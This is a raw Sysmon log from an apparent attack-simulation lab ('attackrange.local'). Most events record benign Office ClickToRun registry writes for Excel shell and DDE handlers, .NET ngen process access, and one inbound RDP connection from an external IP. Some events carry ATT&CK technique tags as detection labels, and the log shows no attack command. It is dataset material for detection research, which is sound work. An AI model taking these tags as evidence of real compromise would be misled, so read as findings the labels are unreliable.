14:57:40.030{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE4-607E-170D-00000000BB01}7112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075199Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:40.014{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE4-607E-170D-00000000BB01}7112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075198Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:40.014{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE4-607E-170D-00000000BB01}7112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000075197Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:39.999{A7A01FEF-EBE3-607E-160D-00000000BB01}5984C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1760-0\Microsoft.Office.Tools.v4.0.Framework.dll2021-04-20 14:57:39.999 354300x800000000000000050306Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:38.553{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-62304-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050305Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:40.412{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AA763FF451F562B8FE245D50091EEF4,SHA256=F3D6AA355F4ABAB73EBF7D351277BD9EB5B32AE157B30E2154F069BBF8C9586D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050304Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:40.022{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5A684239E76352976D42631929A2E2F1,SHA256=5931461454926556DD24DC8F969B6AB5E165BCCFF803C62883295A1A4C0477CD,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000075594Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.983{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excelhtmltemplate\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" 10341000x800000000000000075593Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.983{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE5-607E-240D-00000000BB01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075592Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.983{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template.8\shell\ViewProtected\ddeexec\(Default)(Empty) 13241300x800000000000000075591Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template.8\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /vp "%%1" 13241300x800000000000000075590Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template.8\shell\Printto\ddeexec\(Default)(Empty) 13241300x800000000000000075589Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template.8\shell\Printto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /q "%%1" /j "%%2" 13241300x800000000000000075588Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template.8\shell\Print\ddeexec\(Default)(Empty) 10341000x800000000000000075587Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.967{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBE5-607E-240D-00000000BB01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 13241300x800000000000000075586Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template.8\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /q "%%1" 10341000x800000000000000075585Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.967{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE5-607E-240D-00000000BB01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075584Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template.8\shell\OpenAsReadOnly\ddeexec\(Default)(Empty) 13241300x800000000000000075583Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.952{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template.8\shell\OpenAsReadOnly\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /h "%%1" 13241300x800000000000000075582Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.952{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template.8\shell\Open\ddeexec\(Default)(Empty) 13241300x800000000000000075581Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.952{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template.8\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "%%1" 13241300x800000000000000075580Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.952{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template.8\shell\New\ddeexec\(Default)(Empty) 13241300x800000000000000075579Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.952{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template.8\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /n "%%1" 13241300x800000000000000075578Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.952{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template.8\shell\Edit\ddeexec\(Default)(Empty) 13241300x800000000000000075577Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.952{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Template.8\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /vu "%%1" 13241300x800000000000000075576Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.12\shell\ViewProtected\ddeexec\(Default)(Empty) 13241300x800000000000000075575Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.12\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /vp "%%1" 13241300x800000000000000075574Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.12\shell\Printto\ddeexec\(Default)(Empty) 13241300x800000000000000075573Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.12\shell\Printto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /q "%%1" /j "%%2" 13241300x800000000000000075572Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.12\shell\Print\ddeexec\(Default)(Empty) 13241300x800000000000000075571Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.12\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /q "%%1" 13241300x800000000000000075570Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.12\shell\OpenAsReadOnly\ddeexec\(Default)(Empty) 13241300x800000000000000075569Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.905{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.12\shell\OpenAsReadOnly\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /h "%%1" 13241300x800000000000000075568Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.905{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.12\shell\Open\ddeexec\(Default)(Empty) 13241300x800000000000000075567Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.905{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.12\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "%%1" 10341000x800000000000000075566Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.905{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE5-607E-230D-00000000BB01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075565Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.905{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.12\shell\New\ddeexec\(Default)(Empty) 13241300x800000000000000075564Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.905{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.12\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /n "%%1" 13241300x800000000000000075563Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.889{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.12\shell\Edit\ddeexec\(Default)(Empty) 13241300x800000000000000075562Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.889{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.Sheet.12\shell\Edit\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /vu "%%1" 10341000x800000000000000075561Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.889{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBE5-607E-230D-00000000BB01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075560Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.889{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE5-607E-230D-00000000BB01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075559Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.873{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetMacroEnabled.12\shell\ViewProtected\ddeexec\(Default)(Empty) 13241300x800000000000000075558Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.873{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetMacroEnabled.12\shell\ViewProtected\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /vp "%%1" 13241300x800000000000000075557Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.873{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetMacroEnabled.12\shell\Printto\ddeexec\(Default)(Empty) 13241300x800000000000000075556Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.858{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetMacroEnabled.12\shell\Printto\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /q "%%1" /j "%%2" 13241300x800000000000000075555Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.858{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetMacroEnabled.12\shell\Print\ddeexec\(Default)(Empty) 13241300x800000000000000075554Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.858{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetMacroEnabled.12\shell\Print\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /q "%%1" 13241300x800000000000000075553Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.858{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetMacroEnabled.12\shell\OpenAsReadOnly\ddeexec\(Default)(Empty) 13241300x800000000000000075552Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.858{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetMacroEnabled.12\shell\OpenAsReadOnly\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /h "%%1" 13241300x800000000000000075551Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.858{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetMacroEnabled.12\shell\Open\ddeexec\(Default)(Empty) 13241300x800000000000000075550Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetMacroEnabled.12\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "%%1" 13241300x800000000000000075549Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetMacroEnabled.12\shell\New\ddeexec\(Default)(Empty) 13241300x800000000000000075548Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetMacroEnabled.12\shell\New\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /n "%%1" 13241300x800000000000000075547Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Excel.SheetMacroEnabled.12\shell\Edit\ddeexec\(Default)(Empty) 